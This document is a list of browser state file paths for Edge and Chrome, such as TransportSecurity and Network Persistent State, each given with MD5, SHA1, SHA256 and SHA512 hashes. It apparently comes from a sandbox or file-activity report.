C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 35dc3f0b869b25717704bcca9491db0f
SHA1 d580a56d5632402c81e6b4dcfb0c0c341d541b6b
SHA256 4626264b65f3594a79a3d288c617311d0f1bf7adef3fecc14e1c834a00b774da
SHA512 57690d0a1df95804fbf94afea93aecdd37b5d462796efb7c2a5270ac8fa2fbbab89ad4d4c11e6284a8530ea7fdac3fe52c1b019b8833e2adb508ad9a898e99df

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 250ab213a7926e7b67849f4ad8015889
SHA1 2ef21bac45e3be4285ff517389dd471149067981
SHA256 d47216f5f6fe41099e1682fcdf44f408f875ca6b803baaf72fc71db8601cb961
SHA512 969ff0a50aadbea9f728781173cec22059ac5d65b28a3b680e3e42dba92411f5d6ad4bfa78ecf7f5d657429be8ace81643e1c4bc52ebb2d4632f552818c9163f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2515914bfba7b628d195cc3160df99e9
SHA1 196d72b483100307b17f152462b67053d50bf7fc
SHA256 060bfc92d164a6b08a146eb7415e8f2aa243a19c4ea0b5976a281275c5bebbb6
SHA512 2e5f8616c31eae1b9bfb9a442a01ea3eaca9ad858caadd4f75485cbbc6d8e8433c0285de3c1cefe380ebd46482a91507318a243bbfdfdfb2c8e4006ca9738d32

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 cec315f1e441d6ebc6a39ab6dc351e47
SHA1 1b81a9c5583b617f4e5549f651902d9fadba1c60
SHA256 61f3dc351b04a0da2cb568b4b098f4e2c0cf35b5662c82f20c1c0d44232e0826
SHA512 bf8a09d8805dbbd148b0d5c257145476f6411a7b94901cca41ccdd6453ce029a10b1122d103d7b25f8ba4b0a97f72a0300399d05f91a6e0e2ccad88e45ce0ed0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7e4a88f6cbb817e733d6a6d40250956a
SHA1 6e6baacdd87a294a96e7e00fe7bf229aa4d2d749
SHA256 f2a5e88624e4b0959a8136b7d229af841f81dd077c366c057d9d08ca6a13388e
SHA512 647b38217813c21fc4c7ee217ae92b2e499c3853de64c5cb33fa729de0bad555f5d469a8ee6bf6c9892040514e2d1076b8927eec12a896a7683b1bfb39d33451

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e9c539764c0e3fe14c1649b9ee057ea5
SHA1 0ce75e23e65fdeba81df2814e02aaf508c720b02
SHA256 f4fa6084ab91970434c5af3481943a59eccc1d0ed1d09dd02a07a5d7ffb1e5c4
SHA512 d0ed96d6199cb2ad4625d031c0823a0d2c020ab729c03b9bdfd9ec7510d70d9a2ee868ff3a05e3afa3dc7179451f6f4ded0c28379309e0f001968e198944e2ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 51e1419660064be094c45f674b9084cd
SHA1 8cb7dd9e66b34585a3910eba91db6714ff054bb3
SHA256 1894cf9e281ed55334e6766929933bcba0bafdd87468db71efabdb7d03155a54
SHA512 95069da1e460d552e710ae97927dfc1ab9e83518190d5f2f6f44c7d35abe5feab66ebb7c238fe5021dcda087dc754b0cbcca98611406b6fb091dabf246cf18f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3f45ac4a3e3fa854d48e07df95ebc9d6
SHA1 83bfcaabb046f956db03ba3e6e16a015cb4cca6f
SHA256 459ae06d9465bad4f5a8a738a6c28a73596c84ad7faaf6342cdcc582d956ea93
SHA512 e5db043cd7e089fcef49401ce95d552fb79ffb1809c0d19a850198458bc5150c0966c4c0cdaf8606fbeb963f59681316c9b2e75f0e7f7386d9e9bd8da4af9f2b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2d00f51a1ba334e38577194c09e3543e
SHA1 03afffaaab774d779d770820d55094db80fde67f
SHA256 69b93336a3199d7d159acbb945d726e1a69371c36c8ed1ab3f504356c1373017
SHA512 e8a465708eb6a87fc1412782539e0715971d6187b5a3eba381ae5b2b95de0e0d3fb69e8454062dd9139e3028cefc73bc4faf314c378182ca13a6f03a97630aa0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 027ea71c8edffafe271a6d700d632bec
SHA1 b831026cbcd3e0ec0bd487acc1d12c4d40d8d4e2
SHA256 d53c33b5c4ffacb12b392bebcd33cc9ca84df69cda84893b3eb389e33b3bb89c
SHA512 4d807a4cb86e734f01169bc83d531d51a8b748b9d1181a9ab418e465fba294bf70347196c40c6b788d457cb460954d7c8765f5cc1be9a6a3b841f8adb18324e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8517859dd66cc9f2c4276d5a526b1794
SHA1 3d5b67e8347f50b1a6bb8896ffc1cad4e2aa1819
SHA256 afc5cda03932cd934f76ef2f21bf666af8132c3132c4e2f7dcb275d5e7b109ad
SHA512 049c9b94c2aa69b51314b8177bcfa0d9d6a758c9337321454895a24daeea68575e52dab49086e1f18c2f8b8d01e9e501dbc06ae8d9b1c4a44f4d1a41dde3ba78

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 bd61f8c5ecc9c2e913b51e22b9ca9ec1
SHA1 520b6fdbfa580214e97ee715fa23c4d32cdbf3f6
SHA256 989da36e3fefb51d09c66cf0b27534eab4a2c33dcb16129591da9247c5bc9758
SHA512 2d8cd8f42a0e184eebd2322a8870e06e18d6941a606570b823d7df6f612fddd2bd4d5daefd2f621efc1df7c9166fc07e6da7643abcef0d9df2e13587891be149

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a421f375072c64180af9b72d446a7fd6
SHA1 9e4accd92489401c80f7bc7b99b38fe843abda9a
SHA256 619b89fde2e8605a7b77e6cb58c9e3f906a8ca4410e6b47b153bc6bd2cb8b35f
SHA512 88f24c708ca6f11d3a0888c9a621568ed42284680884fd6bc788a496dfa8c1306f66072a370f958c3626123ab52dda235e84d3159834eb756565c1636d158a3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a496ac166dae695cc1031730733f1172
SHA1 4e600ee89b57e4e0d85e4eb69dfc9f36f7329373
SHA256 796161edf54e66ef9e52f9036b59826ac9b9968793b6135a7355422b0a7389e5
SHA512 dcfbdc9ed0cdf5c21b89fccfb5f99ac12c9a6b5a7bef21be68bf2e10afe6638a66b539b26f14a07d6c6d2b879d0cc08b325c8d0130202907ad059a0f14690914

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e3d00ae0a9c6973d31f4a9fcea2e5c0e
SHA1 6b21f59d04148a0a1d1f289f8dec026450e91a08
SHA256 c774b3d395c78964ec699038d067a9db1616ca8cbd2f9e7a227796ba78858932
SHA512 4c2e565106137fe9d67e61634b94fda5c0267c596443e911e27345f3d037a8eda4391bda94d516e2b6c99e081dbb1d9268971922e747c7144a84776cc46f2e42

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 df8d84bef9e681bb6d2fe64efccd32b8
SHA1 40a23ffee70963dc88e2c17152c010380dec97d3
SHA256 e65e02927ac15592466a769d65cb2940c28d49bbe8aba6b4de80cf65fa868bc4
SHA512 f8017b18b3ad7d45ea994aed5d41a9e434ed11cd637038176573a5ad9dca2db29eb6a089cb4abca492dfe6c5789e06dbb128512388dbc60eb141cd4948f781fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 ac88614ea408eac6b565fc6f5cbbb4bb
SHA1 048fe55906790993f2cd9766fe76ace2b0f14a5c
SHA256 75328bfd3aec55309bff9c0d9f6ed27a9fc4f50f9d5a1c77835b6781cff2b099
SHA512 763802a4b2575599bad714fa467ef5b23b313a8102dc24edb85852cdc42d9ba62002f3d5886ed7fc33a319cd0ffa652256f0cde102b541e636b320bd873f024b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 d6500b996a0999640aba6c0fc6522818
SHA1 1fdf199fd5d104ed9818d589c458c87c8c21d374
SHA256 32310b3c20fc179f9cbae585f552e116a7ad37eda3b029f9fd106cee1294fcdb
SHA512 46075a5a7805cec9ed0a19ef7be0df239aea3f712977b25c06aad57f8d99bc073053fe3970189f598e51cd44e48832174c7f9ffb46060000879285e447a3a556

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 cbc729b5c0a6f80d7f784185b8e0d0fb
SHA1 adad34f070e6e0761ffdd708800b7b0e84f46c97
SHA256 7927699307674382d734f8d8dbec1a2f076c633b59efa93a8c045afe773f22f1
SHA512 35cf637078601c8239f89b1a5aac0639e68a887495cf19934f9952fdecec27dd2603b927241f4c8d5a5d281045a8d62fd4499c52bfd044921029d5a0f0772826

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 19a04754aa1f586d475c57940824978a
SHA1 39aa9c8a69eb474105f5330bf4f504a45064470e
SHA256 6d800ed481821a9cb84e95bb718cdc7d6716e7dab9008b4e35f0f06971888c5a
SHA512 9ca6681f62211e658ca39abcccf0a2e67e07ffaf3efe29299a065752eee46668648d358b52345471333a9c4f9d11327a6dba408d16559ffb107ceefa5c728f55

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7983b1831d7142a655a69c5299d6fe23
SHA1 c10e3aa3ae2228560170a688ee712e0ff7b4cb48
SHA256 21443a4732e6e66da055f531bdfb80a38a1d47606f8663b6004a8de642da24b1
SHA512 ab81cb71a207bb059489a56be1b7793c29360d9f6956d9a5d78a09d30027b8f070c8ca2732b52a6a7ed60eba12402289e7a7966c2534f9a0bf0a8e6815f4b801